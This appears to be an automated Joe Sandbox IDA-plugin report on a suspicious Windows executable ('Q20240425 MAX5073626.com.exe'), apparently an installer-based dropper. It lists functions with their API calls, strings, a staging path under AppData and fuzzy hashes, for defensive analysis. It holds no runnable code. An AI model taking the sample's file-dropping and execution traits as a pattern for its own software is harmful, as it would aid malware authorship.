Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
String ID: M
API String ID: 1688767230-3664761504
Opcode ID: 2b9c824d5e411375aeb6c19a129e7f31917e6c6f88e5252853449caae0cf6005
Instruction ID: 3ae6289146d33c83ffa99c4b1196d227f3808f9024a2eb34a9bbb364589a3c4d
Opcode Fuzzy Hash: 2b9c824d5e411375aeb6c19a129e7f31917e6c6f88e5252853449caae0cf6005
Instruction Fuzzy Hash: F912BEB1604700AFD720AF24DD45A2BB6E9EBC8314F10493EFA95E72E1D7789C418B99

Uniqueness

Uniqueness Score: -1.00%

Function 004040BA Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 281COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040410B
SetWindowTextW.USER32(00000000,?), ref: 00404135

Part of subcall function 00406A60: GetDlgItemTextW.USER32(?,?,00000400,00404F81), ref: 00406A73

Part of subcall function 00406D63: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406DD8
Part of subcall function 00406D63: CharNextW.USER32(?,?,?,00000000), ref: 00406DE7
Part of subcall function 00406D63: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406DEC
Part of subcall function 00406D63: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406E04

Strings

Farserer248 Setup: Completed, xrefs: 004041D6, 00404235
C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest, xrefs: 00404226
: Completed, xrefs: 0040423A, 00404249
A, xrefs: 004041F8

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Char$Next$ItemText$PrevWindow
String ID: : Completed$A$C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest$Farserer248 Setup: Completed
API String ID: 4089110348-1948780045
Opcode ID: e8da0398027bbdd381c3d5239bc3d47e41d793370108c6d054f61ce649ba3777
Instruction ID: 7e70b2b2f584af16b2edeccdbbc43ba6c1c0b0e817574e56c760c2cb475d8cf6
Opcode Fuzzy Hash: e8da0398027bbdd381c3d5239bc3d47e41d793370108c6d054f61ce649ba3777
Instruction Fuzzy Hash: 2091C1B1704311ABD720AF659D81B6B76A8EF84704F40083EFB81B62D1DA7CD9418B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00407146 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
Instruction ID: 41dab7a86df8ef5394c2aff2d5977b3801170d4b09e85d90b9f9b9bad106732f
Opcode Fuzzy Hash: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
Instruction Fuzzy Hash: 5EC14AB1A0C3918FD364CF29C48076ABBE1FBC5304F10892EE5DA9B391D678A546CB57

Uniqueness

Uniqueness Score: -1.00%

Function 00403DBF Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 221windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,?,00000001), ref: 00403E5E
EnableWindow.USER32(?), ref: 00403E6B
GetDlgItem.USER32(?,000003E8), ref: 00403E77
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E93
GetSysColor.USER32(?), ref: 00403EA4
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403EB2
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403EC0
lstrlenW.KERNEL32(?), ref: 00403EC6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403ED3
SendMessageW.USER32(00000000,00000449,?,?), ref: 00403EEA
GetDlgItem.USER32(?,0000040A), ref: 00403F46
SendMessageW.USER32(00000000), ref: 00403F4D
EnableWindow.USER32(00000000), ref: 00403F6A
GetDlgItem.USER32(0000004E,000003E8), ref: 00403F8E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403FE3
LoadCursorW.USER32(00000000,00007F02), ref: 00403FF5
SetCursor.USER32(00000000), ref: 00403FFE

Part of subcall function 00406A19: ShellExecuteExW.SHELL32(?), ref: 00406A28

LoadCursorW.USER32(00000000,00007F00), ref: 00404040
SetCursor.USER32(00000000), ref: 00404043
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040406F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404087

Strings

: Completed, xrefs: 00403FC4
N, xrefs: 00403F7A

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
String ID: : Completed$N
API String ID: 3270077613-2140067464
Opcode ID: bf0178411473ff10941449b467adfe2069e6fc217bc1edb55ad2b2574033c5e5
Instruction ID: bdc84539c7c508f33aefe0d42d4484ce4fd958cb88caf660b8e627917a3e43f3
Opcode Fuzzy Hash: bf0178411473ff10941449b467adfe2069e6fc217bc1edb55ad2b2574033c5e5
Instruction Fuzzy Hash: A0818EB1604305AFD710AF25DE44A6B7BE9FF84344F40493EF681A63A0C7789945CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
BeginPaint.USER32(?,?), ref: 0040104C
GetClientRect.USER32(?,?), ref: 00401062
CreateBrushIndirect.GDI32(00000000), ref: 004010DF
FillRect.USER32(00000000,?,00000000), ref: 004010F3
DeleteObject.GDI32(00000000), ref: 004010FA
CreateFontIndirectW.GDI32(?), ref: 00401120
SetBkMode.GDI32(00000000,00000001), ref: 00401143
SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
SelectObject.GDI32(00000000,00000000), ref: 0040115B
DrawTextW.USER32(00000000,00428520,000000FF,?,00000820), ref: 00401171
SelectObject.GDI32(00000000,00000000), ref: 00401179
DeleteObject.GDI32(?), ref: 0040117F
EndPaint.USER32(?,?), ref: 0040118E

Strings

F, xrefs: 0040100A

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: e7fa8d92a1558c4ea8e958914b5aa13377a66172074e4a1f1d833ba53ee1e4d8
Instruction ID: dc4be63c5e8de3cd74dd871a81a13d155a017f574f4c6123245c4fd1fc1e808f
Opcode Fuzzy Hash: e7fa8d92a1558c4ea8e958914b5aa13377a66172074e4a1f1d833ba53ee1e4d8
Instruction Fuzzy Hash: 3341BF720083549FC7159F65CE4496BBBE9FF88715F150A2EF9D1A22A0CA34C904CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040632C Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,?,00406284,?,?), ref: 00406367
GetShortPathNameW.KERNEL32(00000000,00426668,00000400), ref: 00406370
GetShortPathNameW.KERNEL32(?,00425E68,00000400), ref: 0040638D
wsprintfA.USER32 ref: 004063AB
GetFileSize.KERNEL32(00000000,00000000,00425E68,C0000000,00000004,00425E68,?), ref: 004063E3
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063F3
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00406423
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00425A68,00000000,-0000000A,00408974,00000000,[Rename],00000000,00000000,00000000), ref: 00406443
GlobalFree.KERNEL32(00000000), ref: 00406455
CloseHandle.KERNEL32(00000000), ref: 0040645C

Part of subcall function 00406941: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,80000000,00000003,?,?,?,?,?), ref: 00406945
Part of subcall function 00406941: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 00406965

Strings

h^B, xrefs: 00406383
%ls=%ls, xrefs: 004063A1
[Rename], xrefs: 0040640B, 0040641A
hfB, xrefs: 00406342

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$h^B$hfB
API String ID: 2900126502-1171329002
Opcode ID: 08820cf81893cd09225f6d25635c9de625048d9f9863f0c3732bc9614dc3286f
Instruction ID: 4ebeefcf15104caf89f22b2962055c2ad1d3527d62e6eb1e65ccd43345ed30ff
Opcode Fuzzy Hash: 08820cf81893cd09225f6d25635c9de625048d9f9863f0c3732bc9614dc3286f
Instruction Fuzzy Hash: F33112B12003117BD6202B359E89F7B3A5CDF41718F16453EF942F62C2DA7D89228ABD

Uniqueness

Uniqueness Score: -1.00%

Function 00406D63 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406DD8
CharNextW.USER32(?,?,?,00000000), ref: 00406DE7
CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406DEC
CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406E04

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406D65
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D6A
*?|<>/":, xrefs: 00406DC7

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 589700163-562438032
Opcode ID: 4a806303372201b3e8df9637a6b3a61e7899050057b59a545d854bca18571292
Instruction ID: 56bb63df9d635c950e2032d71a4c8880cc5c791d76c9d1321567f0f8dd80229c
Opcode Fuzzy Hash: 4a806303372201b3e8df9637a6b3a61e7899050057b59a545d854bca18571292
Instruction Fuzzy Hash: AC11E425A0032556DA306B2A8D5097B72E8DFA9761706443FF9C7E32C0E77D9CA192BC

Uniqueness

Uniqueness Score: -1.00%

Function 00405790 Relevance: 12.1, APIs: 8, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004057AD
GetSysColor.USER32 ref: 004057E6
SetTextColor.GDI32(?), ref: 004057F9
SetBkMode.GDI32(?,?), ref: 00405805
GetSysColor.USER32(?), ref: 00405819
SetBkColor.GDI32(?,?), ref: 0040582F
DeleteObject.GDI32(?), ref: 0040584B
CreateBrushIndirect.GDI32(?), ref: 00405855

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: eedd63969569932ea17edb4e5e3784b85700800fb6918c00c6094634e57bf2b4
Instruction ID: 663babe93e8c93df55c8e925e3f7365def0f2c4ff50b98774ac04a93d9623ac7
Opcode Fuzzy Hash: eedd63969569932ea17edb4e5e3784b85700800fb6918c00c6094634e57bf2b4
Instruction Fuzzy Hash: E3210772500A049FCB34AF68DA88A5B77F4EF05710B048A3DE896A26A0CB38E814CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040291D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,?,?), ref: 00402994
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC

Strings

9, xrefs: 00402975

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: File$ByteCharMultiPointerWide$Read
String ID: 9
API String ID: 1439708474-2366072709
Opcode ID: 8dc076b5f6b3d3443fe0be4134894192265ad29a8ba19f4f5d77367b364c169f
Instruction ID: 28bc79e308faf32104528e773e66d3389f01326b3cd86c4d80bcceb8b0528df4
Opcode Fuzzy Hash: 8dc076b5f6b3d3443fe0be4134894192265ad29a8ba19f4f5d77367b364c169f
Instruction Fuzzy Hash: F0513A71618301AFD724DF21CA44A2BB7E8BFD5704F00483FF981A62D0DBB9D9458B2A

Uniqueness

Uniqueness Score: -1.00%

Function 0040570F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00405728
GetMessagePos.USER32 ref: 00405730
ScreenToClient.USER32(?,?), ref: 0040574A
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040575E
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405786

Strings

f, xrefs: 00405760

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b0f783585555dea67517aabca0a75eb3909d461117a357f3308b87a36fca2a36
Instruction ID: 2b79068be4b60ae83c8259db87ec779734d166f8fd3edf9db49dfde3ea6d06c1
Opcode Fuzzy Hash: b0f783585555dea67517aabca0a75eb3909d461117a357f3308b87a36fca2a36
Instruction Fuzzy Hash: 70018C7190020DBADB00AFA4CD41FEEBBB8EF00310F10412AFA50B61D0C7B49A41CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040362A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00403648
MulDiv.KERNEL32(000C2089,00000064,000C2089), ref: 00403670
wsprintfW.USER32 ref: 00403680
SetWindowTextW.USER32(?,?), ref: 00403690
SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A2

Strings

verifying installer: %d%%, xrefs: 0040367A

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 17b569352050f1f4470a00412e90a5bb5e3f2279c164d49800d936e6340ee145
Instruction ID: 6dbe6e730449fbd92a9bf04560b44dcd6c477f830c0b6204617394cde40676b5
Opcode Fuzzy Hash: 17b569352050f1f4470a00412e90a5bb5e3f2279c164d49800d936e6340ee145
Instruction Fuzzy Hash: AC012870540208BBDF20AFA4DE46FAA3B69AB00305F00853EF602B51E0DBB99654CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00402BA3 Relevance: 9.1, APIs: 6, Instructions: 102memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
GlobalFree.KERNEL32(?), ref: 00402C7E
GlobalFree.KERNEL32(00000000), ref: 00402C94
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
